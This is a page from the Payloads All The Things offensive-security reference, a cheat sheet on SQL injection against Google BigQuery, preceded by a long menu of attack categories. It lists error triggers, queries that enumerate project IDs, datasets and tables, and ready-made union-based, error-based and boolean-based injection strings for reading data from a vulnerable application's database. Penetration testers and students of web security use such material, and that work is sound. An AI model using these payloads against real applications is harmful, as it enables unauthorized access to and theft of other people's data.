Skip to content

Payloads All The Things

Google BigQuery SQL Injection

Payloads All The Things

Payloads All The Things
CONTRIBUTING
DISCLAIMER
API Key Leaks
API Key Leaks
- API Key and Token Leaks
- IIS Machine Keys
Account Takeover
Account Takeover
- Account Takeover
- MFA Bypasses
Business Logic Errors
Business Logic Errors
- Business Logic Errors
CORS Misconfiguration
CORS Misconfiguration
- CORS Misconfiguration
CRLF Injection
CRLF Injection
- Carriage Return Line Feed
CSV Injection
CSV Injection
- CSV Injection
CVE Exploits
CVE Exploits
- Common Vulnerabilities and Exposures
- CVE-2021-44228 Log4Shell
Clickjacking
Clickjacking
- Clickjacking
Client Side Path Traversal
Client Side Path Traversal
- Client Side Path Traversal
Command Injection
Command Injection
- Command Injection
Cross Site Request Forgery
Cross Site Request Forgery
- Cross-Site Request Forgery
DNS Rebinding
DNS Rebinding
- DNS Rebinding
DOM Clobbering
DOM Clobbering
- DOM Clobbering
Denial of Service
Denial of Service
- Denial of Service
Dependency Confusion
Dependency Confusion
- Dependency Confusion
Directory Traversal
Directory Traversal
- Directory Traversal
External Variable Modification
External Variable Modification
- External Variable Modification
File Inclusion
File Inclusion
Google Web Toolkit
Google Web Toolkit
- Google Web Toolkit
GraphQL Injection
GraphQL Injection
- GraphQL Injection
HTTP Parameter Pollution
HTTP Parameter Pollution
- HTTP Parameter Pollution
Headless Browser
Headless Browser
- Headless Browser
Hidden Parameters
Hidden Parameters
- HTTP Hidden Parameters
Insecure Deserialization
Insecure Deserialization
Insecure Direct Object References
Insecure Direct Object References
- Insecure Direct Object References
Insecure Management Interface
Insecure Management Interface
- Insecure Management Interface
Insecure Randomness
Insecure Randomness
- Insecure Randomness
Insecure Source Code Management
Insecure Source Code Management
JSON Web Token
JSON Web Token
- JWT - JSON Web Token
Java RMI
Java RMI
- Java RMI
LDAP Injection
LDAP Injection
- LDAP Injection
LaTeX Injection
LaTeX Injection
- LaTeX Injection
Mass Assignment
Mass Assignment
- Mass Assignment
Methodology and Resources
Methodology and Resources
NoSQL Injection
NoSQL Injection
- NoSQL Injection
OAuth Misconfiguration
OAuth Misconfiguration
- OAuth Misconfiguration
ORM Leak
ORM Leak
- ORM Leak
Open Redirect
Open Redirect
- Open URL Redirect
Prompt Injection
Prompt Injection
- Prompt Injection
Prototype Pollution
Prototype Pollution
- Prototype Pollution
Race Condition
Race Condition
- Race Condition
Regular Expression
Regular Expression
- Regular Expression
Request Smuggling
Request Smuggling
- Request Smuggling
SAML Injection
SAML Injection
- SAML Injection
SQL Injection
SQL Injection
- SQL Injection
- Google BigQuery SQL Injection Google BigQuery SQL Injection
  Table of contents
- Cassandra Injection
- DB2 Injection
- MSSQL Injection
- MySQL Injection
- Oracle SQL Injection
- PostgreSQL Injection
- SQLite Injection
- SQLmap
Server Side Include Injection
Server Side Include Injection
- Server Side Include Injection
Server Side Request Forgery
Server Side Request Forgery
Server Side Template Injection
Server Side Template Injection
Tabnabbing
Tabnabbing
- Tabnabbing
Type Juggling
Type Juggling
- Type Juggling
Upload Insecure Files
Upload Insecure Files
- Upload Insecure Files
- Configuration Apache .htaccess
  Configuration Apache .htaccess
  - .htaccess
Web Cache Deception
Web Cache Deception
- Web Cache Deception
Web Sockets
Web Sockets
- Web Sockets
XPATH Injection
XPATH Injection
- XPATH Injection
XSLT Injection
XSLT Injection
- XSLT Injection
XSS Injection
XSS Injection
XXE Injection
XXE Injection
- XML External Entity
Zip Slip
Zip Slip
- Zip Slip
LEARNING AND SOCIALS
LEARNING AND SOCIALS
- Books
- Twitter
- Youtube
template vuln
template vuln
- Vulnerability Title

Google BigQuery SQL Injection

Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.

Summary

Detection
BigQuery Comment
BigQuery Union Based
BigQuery Error Based
BigQuery Boolean Based
BigQuery Time Based
References

Detection

Use a classic single quote to trigger an error: '
Identify BigQuery using backtick notation: SELECT .... FROM `` AS ...

SQL Query	Description
`SELECT @@project_id`	Gathering project id
`SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA`	Gathering all dataset names
`select * from project_id.dataset_name.table_name`	Gathering data from specific project id & dataset

BigQuery Comment

Type	Description
`#`	Hash comment
`/* PostgreSQL Comment */`	C-style comment

BigQuery Union Based

UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#

BigQuery Error Based

SQL Query	Description
`' OR if(1/(length((select('a')))-1)=1,true,false) OR '`	Division by zero
`select CAST(@@project_id AS INT64)`	Casting

BigQuery Boolean Based

' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#

BigQuery Time Based

Time based functions does not exist in the BigQuery syntax.

References